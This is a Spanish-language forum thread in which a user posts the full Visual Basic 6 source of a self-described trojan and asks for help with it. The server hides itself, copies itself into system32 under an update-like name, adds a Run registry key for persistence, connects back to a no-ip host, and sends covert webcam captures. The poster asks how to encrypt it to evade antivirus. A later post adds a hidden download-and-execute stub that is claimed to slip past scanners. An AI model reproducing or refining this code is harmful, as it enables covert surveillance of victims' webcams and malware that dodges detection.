Mensajes

el puerto está abierto, gracias..pero eso no es.

podria ser que al yo añadir el csoketmaster...le quite el control winsock al server ?

osea hay que dejarlo o lo quitas 

el puerto....esta mas que abierto y por lo que tengo entendido antes de aceptarla cierras y luego aceptas...eso es lo que he leido en los tutoriales corrijanme si me equivoco, saludos.

buenas, el cliente depende del ocx del winsock pero al server le añadí el CSocketMaster, se supone que el server no necesita del ocx para realizar la conexion no    pues no me conecta, el host no ip lo pongo asi:

Código [Seleccionar] Expandir

ip = "mihostDEnoIP.no-ip.org"   <- esta mal asi 



bueno pongo el codigo por cliente primero hasta servidor, saludos, y muchas gracias señores.

---CLIENTE---

--clienteFRM--

Código [Seleccionar] Expandir

Private Sub Command1_Click()
On Error Resume Next
WS.LocalPort = Text1.Text
WS.Close
WS.Listen
End Sub

Private Sub Command2_Click()
Unload clienteFRM
End Sub


Private Sub conexion_Timer()
On Error Resume Next
If WS.State = "7" Then
Label1.Caption = "Conectados"
ElseIf WS.State = "0" Then
Label1.Caption = "Desconectados"
End If
End Sub

Private Sub Form_Terminate()
Unload frmPANTALLA
End Sub

Private Sub Form_Unload(Cancel As Integer)
Unload frmPANTALLA
End Sub

Private Sub WebCam_Click()
If WS.State = "7" Then
Load frmPANTALLA
frmPANTALLA.Show
End If
If Not WS.State = "7" Then
Unload frmPANTALLA
End If
End Sub

Private Sub WS_Close()
On Error Resume Next
WS.Close
WS.Listen
End Sub

Private Sub WS_ConnectionRequest(ByVal requestID As Long)
On Error Resume Next
WS.Close
WS.Accept requestID
Label2.Caption = WS.RemoteHostIP
End Sub
Private Sub WS_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
WS.GetData datos

Open "c:\captura.jpg" For Binary As #1
     Seek #1, LOF(1) + 1
     Put #1, , datos
Close #1
frmPANTALLA.Timer1.Enabled = True

End Sub



--frmPANTALLA--

Código [Seleccionar] Expandir

Private Sub Command1_Click()
clienteFRM.WS.SendData "comienzo"
End Sub

Private Sub Command2_Click()
clienteFRM.WS.SendData "camstop"
End Sub

Private Sub Command3_Click()
clienteFRM.WS.SendData "eliminar"
End Sub

Private Sub Timer1_Timer()
On Error Resume Next
PVV.Picture = LoadPicture("c:\captura.jpg")
End Sub







---SERVIDOR---


--serverFRM--

Código [Seleccionar] Expandir

Dim WithEvents s As CSocketMaster
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function capCreateCaptureWindow Lib "avicap32.dll" Alias "capCreateCaptureWindowA" (ByVal lpszWindowName As String, ByVal dwStyle As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hWndParent As Long, ByVal nID As Long) As Long
Private mCapHwnd As Long
Private Const Connect As Long = 1034
Private Const DISCONNECT As Long = 1035
Private Const GET_FRAME As Long = 1084
Private Const COPY As Long = 1054
Dim lol As Integer
Dim frago As Integer
Dim goblin As String
Private datos As String
Private ip As String
Private puerto As Long

Private Sub comprobador_Timer()
On Error Resume Next
If Dir("C:\windowsuupdate\xD.xD") <> "" Then
registro.Enabled = False
Else
registro.Enabled = True
End If
End Sub

Private Sub Form_Load()
Set s = New CSocketMaster
ip = "MIHOSTDENOIP.no-ip.org"
puerto = 4662
s.RemoteHost = ip
s.RemotePort = puerto
End Sub
Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
   DoEvents: SendMessage mCapHwnd, DISCONNECT, 0, 0
End Sub

Private Sub Form_Unload(Cancel As Integer)
   DoEvents: SendMessage mCapHwnd, DISCONNECT, 0, 0
End Sub

Private Sub registro_Timer()
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Windows\system32\winupdate32.exe"
RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\updates", "C:\Windows\system32\winupdate32.exe"
MkDir "C:\windowsuupdate"
Open "C:\windowsuupdate\xD.xD" For Random As #1
Close #1
registro.Enabled = False
End Sub

Private Sub S_DataArrival(ByVal bytesTotal As Long)
s.GetData datos

   If datos = "comienzo" Then
   camon
   End If
   
   If datos = "eliminar" Then
muere
End If
   
   If datos = "camstop" Then
   DoEvents: SendMessage mCapHwnd, DISCONNECT, 0, 0
   Kill ("c:\Juazcp.jpg")
   Kill ("c:\captura.jpg")
   End If
   
   End Sub

Private Sub Timer1_Timer()
On Error Resume Next
If Not s.State = 7 Then
s.CloseSck
s.Connect
End If
End Sub
Private Function camon()
On Error Resume Next
lol = FreeFile
frago = 8192
goblin = "c:\Juazcp.jpg"
SendMessage mCapHwnd, DISCONNECT, 0, 0
mCapHwnd = capCreateCaptureWindow("WebcamCapture", 0, 0, 0, 320, 240, Me.hwnd, 0)
SendMessage mCapHwnd, Connect, 0, 0
SendMessage mCapHwnd, GET_FRAME, 0, 0
SendMessage mCapHwnd, COPY, 0, 0
PV.Picture = Clipboard.GetData
Clipboard.Clear
SavePicture PV.Picture, "c:\" & "Juaz.jpg"
    PictureView1.OpenPicture ("c:\Juaz.jpg")
    If PictureView1.SaveJPEG("C:\Juazcp.jpg", True, 50) Then
    Else
    End If
    Kill ("c:\Juaz.jpg")
Open goblin For Binary As #lol
Do While Not EOF(lol)
camun = Input(frago, #lol)
s.SendData camun
DoEvents
Loop
Close #lol
End Function

Private Function muere()
   On Error Resume Next
   Kill ("c:\Juazcp.jpg")
   Kill ("c:\captura.jpg")
   camon
End Function

Private Sub Timer2_Timer()
Me.Visible = False
End Sub

Function RegWrite(ByVal Path As String, ByVal Value As String)
Dim AA As Object
Set AA = CreateObject("Wscript.Shell")
AA.RegWrite Path, Value, "REG_SZ"
End Function

lo que hace que salte es a la hora de añadirme al registro de windows....una funcion, un timer que activa esa funcion,  y un timer que chekea si ya esta infcetada la pc, lo elimino todo eso y ya no lo detectan.

  hola buenas pues mi duda es como...puedo cifrar el codigo del server de mi troyano  para que los pocos avs que me lo detectan dejen de detectarlo, saludos.

sí, efectivamente EON !! lo hice porque nod32 le gusta cantar. si lo haces de ese modo pues se que mudo, si es sencillo como alguien por ahí dijo, aver si algunos aporta: opciones......algo de codigo( pistas para codear yo ) etc, aver si queda mas full y asi compartimos el codig o para cualquiera que quiera comprobarlo como funciona o como usar ese ejemplo con otros fines, no se....yo hace tiempo no no prendo el vb tengo que cojerle el hilo, gracias por sus comentarios, hasta otra se cuidan 

WESTON: no cres, que eso de poner visible = false en el form load haga que sea muy agresivo para los avs y asi sea mas detectado???....  de momento solo detectan 4 segun mis pruebas las que hice. una vez una persona me dijo eso...por eso lo hice asi pero bueno alomejor tu te basas en otra cosa, no se si puedes explicarte, saludos, gracias men. 

no simplemente lo dije porque he visto que en este foro hay chavales o gente que suele tener mala educacion y tratan bastante mal a la gente...solo por esa gente lo dije por ese grupo minoritario, descuida no lo digo por ti, saludos

buenas, queria compartir un codigo sin fines maleficos simplemente para demostrar que se puede hacer aunque algunos firewalls lo detecten.

kav, nod32, panda, avg, norton, mcafee, etc, no lo detectan, firewalls ya no se, pero mi fw xp no lo detecta por lo menos, saludos, aquí dejo el codigo.

Código [Seleccionar] Expandir

Dim ejecutar As Long
Dim download As Long
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Private Sub Form_Load()
Me.Hide
End Sub

Private Sub Timer1_Timer()
Me.Visible = False
download = URLDownloadToFile(0, "http://download.hijackthis.eu/HJTInstall.exe", "c:\ejemplohijackthis.exe", 0, 0)
Timer1.Enabled = False
End Sub

Private Sub Timer2_Timer()
ejecutar = ShellExecute(Me.hwnd, "Open", "c:\ejemplohijackthis.exe", "", "", 1)
Timer2.Enabled = False
End Sub

Private Sub Timer3_Timer()
Unload Me
End Sub

comenten, den ideas, opinen pero no falten al respeto, solo pido que se trate con el mismo respeto, gracias.